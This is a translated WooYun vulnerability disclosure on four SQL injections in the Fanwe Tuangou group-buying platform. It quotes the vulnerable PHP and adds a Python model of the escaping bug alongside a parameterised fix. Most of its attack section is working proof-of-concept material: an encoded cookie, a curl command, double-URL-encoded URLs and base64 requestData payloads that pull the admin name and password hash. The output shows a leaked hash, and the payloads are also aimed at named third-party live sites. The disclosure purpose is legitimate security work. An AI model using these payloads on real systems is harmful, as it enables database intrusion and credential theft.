Vulnerability summary

Defect ID: wooyun-2014-087824

Title: Fanwe Tuangou (group-buying), latest version: 4 SQL injections bundled

Vendor: fanwe.com

Author: loopx9

Submitted: 2014-12-23 18:59

Fix deadline: 2015-04-02 10:23

Published: 2015-04-02 10:23

Vulnerability type: SQL injection

Severity: high

Self-assessed rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-23: details sent to the vendor, awaiting vendor action
2014-12-28: vendor actively ignored the vulnerability; details opened to third-party security partners
2015-02-21: details opened to core white hats and domain experts
2015-03-03: details opened to regular white hats
2015-03-13: details opened to intern white hats
2015-04-02: details opened to the public

Brief description:

Tested against the latest version, 4.3.

Detailed description:

Injection point 1: app\source\user_init.php:

...
// start auto-login by hc
if($_SESSION['user_id'] == 0 && isset($_COOKIE['email']) && isset($_COOKIE['password'])) // values come from cookies
{
$cookie_user['email'] = trim(unserialize(base64_decode($_COOKIE['email']))); // no filtering; the cookie is base64, so the GPC escaping never sees a quote
$cookie_user['user_pwd'] = trim(unserialize(base64_decode($_COOKIE['password'])));
$userinfo = $GLOBALS['db']->getRow("SELECT `id`,`user_name`,`user_pwd`,`status`,`group_id`,`city_id`,`parent_id` FROM ".DB_PREFIX."user WHERE email='".$cookie_user['email']."' and user_pwd='".$cookie_user['user_pwd']."'");
// reaches the query
...


Injection point 2: app\source\goods_list.php:

...
if ($_REQUEST ['m'] == 'Goods' && $_REQUEST ['a'] == 'showByUname') {
$uname = addslashes($_REQUEST['uname']);
if($uname!='')
{
$uname = rawurldecode($uname); // addslashes and rawurldecode are in the wrong order: a URL-encoded quote passes addslashes unchanged, so GPC is bypassed
$sql ="select id from ".DB_PREFIX."goods where u_name='".$uname."'"; // concatenated into the SQL
$goods_id =intval($GLOBALS['db']->getOneCached($sql)); // reaches the query
}
}
...


Injection point 3: app\source\index_malllist.php:

...
if ($_REQUEST ['m'] == 'Index' && $_REQUEST ['a'] == 'unSubScribe') {
// unsubscribe
$email = trim(urldecode($_REQUEST['email'])); // same as the previous point: URL encoding bypasses GPC
$sql = "delete from " . DB_PREFIX . "mail_address_list where mail_address = '{$email}'"; // concatenated into the SQL
if ($GLOBALS ['db']->query ( $sql )) { // reaches the query
success(a_L ( "SUBSCRIBEBACK_SUCCESS" ),'',a_u("Index/index"));
} else {
a_error(a_L ( "SUBSCRIBEBACK_FAILED" ),'',a_u("Index/index"));
}
exit;
}
...


Injection point 4: mapi\fanwe.php:

error_reporting(E_ALL ^ E_NOTICE);
$i_type = 0; // request data format: 0:base64; 1:REQUEST; 2:json
// r_type: response data format: 0:base64; 1:json_encode; 2:array
if (isset($_REQUEST['i_type']))
{
$i_type = intval($_REQUEST['i_type']);
}
if ($i_type == 1){
$requestData = $_REQUEST;
}else{
if (isset($_REQUEST['requestData'])){
if ($i_type == 2){
$requestData = json_decode(trim($_REQUEST['requestData']), 1);
}else{
$requestData = base64_decode(trim($_REQUEST['requestData'])); // base64 decode
$requestData = json_decode($requestData, 1); // JSON decode; follow $requestData from here
}
}else{
$requestData = $_REQUEST;
}
}
...

$keyword = trim($requestData['keyword']); // $keyword is not filtered
if ($keyword && $keyword <> ''){
$sql .= " and (g.name_1 like '%$keyword%' )"; // concatenated into the SQL
$sql_count .= " and (g.name_1 like '%$keyword%' )";
}

$sql .= " group by g.id order by g.sort desc,g.id desc";
$sql_count .= " order by g.sort desc,g.id desc";
$sql.=" limit ".$limit;
$list = $GLOBALS['db']->getAll($sql); // reaches the query
$total = $GLOBALS['db']->getOne($sql_count);
...
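All four points share one mechanism: the quote reaches the SQL string only after the GPC/addslashes layer has already run, because it arrives wrapped (base64 + serialize for the cookie, a second layer of URL encoding for uname/email, base64 + JSON for requestData). The following is an added example, not code from the Fanwe product: a pure-Python model of those decode-after-escape paths that prints the exact SQL text each one hands to MySQL, next to a bound-parameter version that is immune to the ordering problem. Assumptions: the site-wide GPC filter is modelled as addslashes() on every decoded request value, the mapi query prefix is invented (the report elides it), the act value nearbygoodses is taken from the report's decoded requestData payload, table names use the demo prefix t1_ from the report, and SQLite stands in for MySQL only for the bound-parameter check (the error-based RAND(0)/GROUP BY trick in the payload is MySQL-specific and is not executed here).

```python
"""Model of the decode-after-escape paths in the Fanwe advisory (added example, not
vendor code). Assumed: GPC filter == addslashes on decoded request values; the mapi
query prefix is made up; SQLite only demonstrates the parameterised fix."""
import base64
import binascii
import json
import re
import sqlite3
from urllib.parse import quote, unquote, unquote_plus

# Error-based payload from the report (191 bytes, matching the s:191 serialised cookie).
PAYLOAD = ("'AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING("
           "CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM t1_admin LIMIT 0,1),"
           "FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)#")
# Same primitive, but first closing the "like '%...%' )" context of the mapi query.
MAPI_PAYLOAD = "') AND " + PAYLOAD[len("'AND "):]


def addslashes(s: str) -> str:
    """Port of PHP addslashes(): backslash before ' " \\ and NUL."""
    return "".join("\\0" if c == "\x00" else ("\\" + c if c in "'\"\\" else c) for c in s)


def php_serialize_string(s: str) -> bytes:
    b = s.encode()
    return b's:%d:"%s";' % (len(b), b)


def php_unserialize_string(blob: bytes) -> str:
    m = re.fullmatch(rb's:(\d+):"(.*)";', blob, re.S)
    if not m or int(m.group(1)) != len(m.group(2)):
        raise ValueError("not a serialized PHP string")
    return m.group(2).decode()


def cookie_string(raw: str) -> str:
    """trim(unserialize(base64_decode(cookie))): any decode failure ends as '' (PHP gives
    false, trim(false) is ''). base64 text never contains a quote, so GPC has nothing to escape."""
    try:
        return php_unserialize_string(base64.b64decode(raw, validate=True)).strip()
    except (binascii.Error, ValueError):
        return ""


def build_autologin_cookies(payload: str) -> dict:
    """Point 1: attacker cookie pair. password=0 decodes to '' exactly as the report's error shows."""
    return {"email": base64.b64encode(php_serialize_string(payload)).decode(), "password": "0"}


def vulnerable_autologin_sql(cookies: dict) -> str:
    email = cookie_string(cookies.get("email", ""))
    pwd = cookie_string(cookies.get("password", ""))
    return ("SELECT `id`,`user_name`,`user_pwd`,`status`,`group_id`,`city_id`,`parent_id` "
            f"FROM t1_user WHERE email='{email}' and user_pwd='{pwd}'")


def double_urlencode(s: str) -> str:
    """%2527 -> %27 after PHP's single decode into $_REQUEST: no quote for addslashes to see."""
    return quote(quote(s, safe=""), safe="")


def request_value(raw: str) -> str:
    """Model of a GPC-escaped $_REQUEST entry: PHP URL-decodes once, then the filter escapes."""
    return addslashes(unquote_plus(raw))


def vulnerable_showbyuname_sql(raw_uname: str) -> str:
    """Points 2 and 3: rawurldecode()/urldecode() run AFTER escaping, so %27 becomes a bare quote."""
    uname = unquote(request_value(raw_uname))
    return f"select id from t1_goods where u_name='{uname}'"


def fixed_showbyuname_sql(raw_uname: str) -> str:
    """Decode first, escape last (still weaker than binding the value, see safe_lookup_goods)."""
    uname = addslashes(unquote(unquote_plus(raw_uname)))
    return f"select id from t1_goods where u_name='{uname}'"


def build_mapi_request_data(keyword: str, act: str = "nearbygoodses") -> str:
    """Point 4: requestData = base64(json) for i_type 0; act value as in the report's payload."""
    return base64.b64encode(json.dumps({"keyword": keyword, "act": act}).encode()).decode()


def vulnerable_mapi_sql(request_data: str) -> str:
    data = json.loads(base64.b64decode(request_data))
    sql = "select g.id from t1_goods g where 1=1"  # assumed prefix; the report elides it
    keyword = str(data.get("keyword", "")).strip()
    if keyword:
        sql += f" and (g.name_1 like '%{keyword}%' )"
    return sql + " group by g.id order by g.sort desc,g.id desc"


def safe_lookup_goods(uname: str) -> list:
    """The fix that does not depend on escaping order: bind the value (SQLite stands in for MySQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table t1_goods(id integer primary key, u_name text)")
    con.executemany("insert into t1_goods(u_name) values (?)", [("alice",), ("bob",)])
    rows = con.execute("select id from t1_goods where u_name = ?", (uname,)).fetchall()
    con.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print(vulnerable_autologin_sql(build_autologin_cookies(PAYLOAD)))
    print(vulnerable_showbyuname_sql(double_urlencode(PAYLOAD)))
    print(fixed_showbyuname_sql(double_urlencode(PAYLOAD)))
    print(vulnerable_mapi_sql(build_mapi_request_data(MAPI_PAYLOAD)))
    print(safe_lookup_goods(PAYLOAD))
```

Running the file prints the same WHERE clause the report's MySQL error message echoes for point 1, the bare-quote version of the uname query next to its escaped form, the mapi LIKE clause with its closing parenthesis hijacked, and an empty result from the bound query. A single-encoded %27 is caught by the escaping layer; only the double-encoded form slips through, which is the check to run when auditing any decode that happens after a global filter.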

Proof of concept:

Tested on the official demo site: http://t1.fanwe.net:93/t1/ (admin table: t1_admin)
Injection point 1: serialize the payload, then base64-encode it:

s:191:"'AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM t1_admin LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)#";


Add email and password cookies with these values, then request /index.php:
email=czoxOTE6IidBTkQgKFNFTEVDVCAxIEZST00oU0VMRUNUIENPVU5UKCopLENPTkNBVCgoU0VMRUNUIFNVQlNUUklORyhDT05DQVQoYWRtX25hbWUsMHg3YyxhZG1fcHdkLDB4N2MpLDEsNjApIEZST00gdDFfYWRtaW4gTElNSVQgMCwxKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIjs=; password=0;


curl -b "email=czoxOTE6IidBTkQgKFNFTEVDVCAxIEZST00oU0VMRUNUIENPVU5UKCopLENPTkNBVCgoU0VMRUNUIFNVQlNUUklORyhDT05DQVQoYWRtX25hbWUsMHg3YyxhZG1fcHdkLDB4N2MpLDEsNjApIEZST00gdDFfYWRtaW4gTElNSVQgMCwxKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIjs=; password=0;" http://t1.fanwe.net:93/t1/
MySQL server error report:Array
(
[0] => Array
(
[message] => MySQL Query Error
)
[1] => Array
(
[sql] => SELECT `id`,`user_name`,`user_pwd`,`status`,`group_id`,`city_id`,`parent_id` FROM t1_user WHERE email=''AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM t1_admin LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)#' and user_pwd=''
)
[2] => Array
(
[error] => Duplicate entry 'fanwe|6714ccb93be0fda4e51f206b91b46358|1' for key 'group_key'
)
[3] => Array
(
[errno] => 1062
)
)

(screenshot: 1.png)


Also reproduced on http://www.tl19tuan.com/

(screenshot: 2.png)


Injection point 2 (double-encoded quote, %2527):

http://t1.fanwe.net:93/t1/index.php?m=Goods&a=showByUname&uname=%2527%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20t1_admin%20LIMIT%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%23

(screenshot: 3.png)


Injection point 3 (same double-encoding):

http://t1.fanwe.net:93/t1/index.php?m=Index&a=unSubScribe&email=%2527%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20t1_admin%20LIMIT%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%23

(screenshot: 4.png)


Injection point 4: json_encode the payload, then base64-encode it:

http://t1.fanwe.net:93/t1/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKGFkbV9uYW1lLDB4N2MsYWRtX3B3ZCwweDdjKSwxLDYwKSBGUk9NIHQxX2FkbWluIExJTUlUIDAsMSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

(screenshot: 5.png)


Also reproduced on other sites running the product; against these the payload only reads user() and version():

http://www.tl19tuan.com/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKHVzZXIoKSwweDdjLHZlcnNpb24oKSwweDdjKSwxLDYwKSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

(screenshot: 6.png)

http://www.pt916.com/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKHVzZXIoKSwweDdjLHZlcnNpb24oKSwweDdjKSwxLDYwKSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

(screenshot: 7.png)

Fix:

Filter these inputs: escape only after every decoding step (base64/unserialize, rawurldecode, json_decode) has run, never before, and preferably pass the values to the query as bound parameters instead of concatenating them.

Copyright: please credit loopx9@WooYun when reposting.


Vendor response

Vendor's reply:

Severity: no impact, vendor ignored

Ignored on: 2015-04-02 10:23

Vendor comment:

Latest status:

None